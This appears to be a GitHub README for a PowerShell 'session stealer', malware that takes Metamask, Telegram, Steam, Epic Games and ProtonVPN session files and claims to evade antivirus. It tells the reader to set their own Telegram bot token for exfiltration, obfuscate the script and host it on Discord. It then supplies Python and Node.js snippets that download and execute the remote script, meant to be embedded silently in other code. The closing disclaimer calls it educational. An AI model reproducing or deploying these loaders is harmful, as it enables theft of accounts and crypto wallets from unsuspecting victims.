Powershell Session Stealer
Telegram Channel
Report Bug
·
Request Feature
·
Send a Pull Request
Vare Session Stealer is a file stealer that aims to bypass Antiviruses during Runtime and Scantime using Powershell
┌──(Saint@root)-[~/]
└─$ cat VareSessionStealer
@Sessions
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
| Metamask Session File - From Opera, OperaGX, Chrome [Profile 1,2,3]
| Telegram Session File - From Base Path
| Steam Session File - From Base Path
| Epicgames Session File - From Base Path
| ProtonVPN Session File - From Base Path
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬- Download Project
- Change
$chatidAnd$bottokenWith Yours - Obfuscate "PS1" File Using AES Encoder
- You're Done!
Upload the code you created and obfuscate to places that provide direct downloads such as discord and get the link (ex; discord.com/attchments/4455/file.ps1)
import subprocess
powershell_cmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content"
subprocess.run(["powershell", "-Command", powershell_cmd], capture_output=False, text=False)Change "YOUR FILE URL" then add this to your code
const { exec } = require('child_process');
const powershellCmd = "iex (Invoke-WebRequest -Uri 'YOUR FILE URL' -UseBasicParsing).Content";
exec(`powershell -Command "${powershellCmd}"`, (error, stdout, stderr) => {});Change "YOUR FILE URL" then add this to your code - i havent tested it but it will work 🤓
If you want to support me and my project, you can do the following, thank you
- Fork the Project
- Star the Project
- Open a Pull Request
- Anti Virustotal / AntiVM
- More Sessions (Gaming,Vpns,etc...)
- Anti Analysis
- New Obfuscation (Maybe 🤓)
I am not responsible for the damages caused by this code, everyone will use this code under their own responsibility, the code is shared for educational purposes. POC